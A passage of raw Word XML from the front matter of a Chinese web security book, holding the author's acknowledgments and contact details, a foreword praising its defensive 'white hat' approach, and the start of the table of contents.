          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="141"/>
        <w:ind w:left="203" w:right="176" w:firstLine="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="联系方式：" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在接下来的两章中，首先阐述了安全开发流程的实施过程，以及笔者积累的一些经验。然后谈到了公司安全团队的职责，以及如何建立一个健康完善的安全体系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>本书也可以当做一本安全参考书，读者在遇到问题时，可以挑选任何所需要的章节进行阅读。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>致谢</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="176" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>感谢我的妻子，她的支持是对我最大的鼓励。本书最后的成书时日，是陪伴在她的病床边完成的，我将铭记一生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="176" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>感谢我的父母，是他们养育了我，并一直在背后默默地支持我的事业，使我最终能有机会在这里写下这些话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="123" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>感谢我的公司阿里巴巴集团，它营造了良好的技术与实践氛围，使我能够有今天的积累。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>同时也感谢在工作中一直给予我帮助和鼓励的同事、上司，他们包括但不限于：魏兴国、汤城、刘志生、侯欣杰、林松英、聂万全、谢雄钦、徐敏、刘坤、李泽洋、肖力、叶怡恺。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>感谢季昕华先生为本书作序，他一直是所有安全工作者的楷模与学习的对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>也感谢博文视点的张春雨先生以及他的团队，是他们的努力使本书最终能与广大读者见面。他们的专业意见给了我很多的帮助。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>最后特别感谢我的同事周拓，他对本书提出了很多有建设性的意见。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>联系方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="456" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="604" w:right="5255"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>邮箱：</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>opensystem@gmail.com </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>博客：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="95"/>
          </w:rPr>
          <w:t>http://hi.baidu.com/aullik5 </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>微博：</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://t.qq.com/aullik5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:ind w:left="1203"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
          </w:rPr>
          <w:t>http://weibo.com/n/aullik5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:right="624"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>吴翰清</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="621"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2012 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>月于杭州</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="333" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="332" w:right="0" w:hanging="129"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>VIII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="75"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300"/>
        <w:ind w:left="7129" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="c序言（11-474）" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="120"/>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>序言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="57"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2012 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>年农历春节，我回到了浙西的老家，外面白雪皑皑。在这与网络隔离的小乡村里，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>这可以夜不闭户的小乡村里，过着与网络无关、与安全无关的生活，而我终于可以有时间安安静静拜读吴翰清先生的这本大作了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>认识吴翰清先生源于网络、源于安全，并从网络走向生活，成为朋友。他对于安全技术孜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>孜不倦的研究，使得他年纪轻轻便成为系统、网络、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>等多方面安全的专家；他对于安全技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>术的分享，创建了“幻影旅团”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>4n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>组织，培养了一批安全方面的技术人才，并带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>动了整个行业的交流氛围；他和同事在大型互联网公司对安全方面的不断实践，全面保护着阿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>里巴巴集团的安全；他对于安全的反思和总结并发布在他的博客上，使得我们能够更为深入地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>理解安全的意义，处理安全问题的方法论。而今天，很幸运，我们能系统的地看到吴翰清先生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>多年在大型互联网公司工作实践、总结反思所积累的安全观和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>安全技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>中国人自己编写的安全专著不多，而在这为数不多的书中，绝大部分也都是“黑客攻击” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>速成手册。这些书除了在技术上仅立足于零碎的技术点、工具使用手册、攻击过程演示，不系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>统之外，更为关键的是，它们不是以建设者的角度去解决安全问题。吴翰清先生是我非常佩服</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>的“白帽子”，他和一群志同道合的朋友，一直以建设更安全的互联网为己任，系统地研究安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>全，积极分享知识，为中国的互联网安全添砖加瓦。而这本书也正是站在白帽子的视角，讲述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>安全的方方面面，它剖析攻击原理，目的是让互联网开发者、技术人员了解原理，并通过自身的实践，告诉大家分析这些问题的方法论、思想以及对应的防范方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="159"/>
        <w:ind w:left="203" w:right="125" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>最让我共鸣的是“安全运营”的思路，我相信这也是吴翰清先生这么多年在互联网公司工</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>作的最大收获之一，因为运营是互联网公司的最大特色和法宝。安全是一个动态的过程，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>敌方攻击手段在变，攻击方法在变，漏洞不断出现；我方业务在变，软件在变，人员在变，妄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>图通过一个系统、一个方案解决所有的问题是不现实的，也是不可能的，安全需要不断地运营、持续地优化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>瑞雪兆丰年，一直在下的雪预示着今年的丰收。我想在经历了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2011 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年中国互联网最大安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>全危机之后，如白雪一样纯洁的《白帽子讲 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>安全》应该会给广大的从事互联网技术人员带来更多的帮助，保障中国互联网的安全，迎来互联网的又一个春天。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:right="620"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>季昕华 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Benjurry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="134"/>
        <w:ind w:left="0" w:right="221"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:bookmarkStart w:name="d目录 11-474" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="115"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:pos="1159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:ind w:right="19"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>第一</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>篇</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>世界观安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:14.439317pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1120;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="254,289" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:288;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shapetype id="_x0000_t202" o:spt="202" coordsize="21600,21600" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape style="position:absolute;left:1195;top:308;width:7255;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7234" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>我</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>的</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>全</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>世</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>界</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>观</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>2</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:354;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
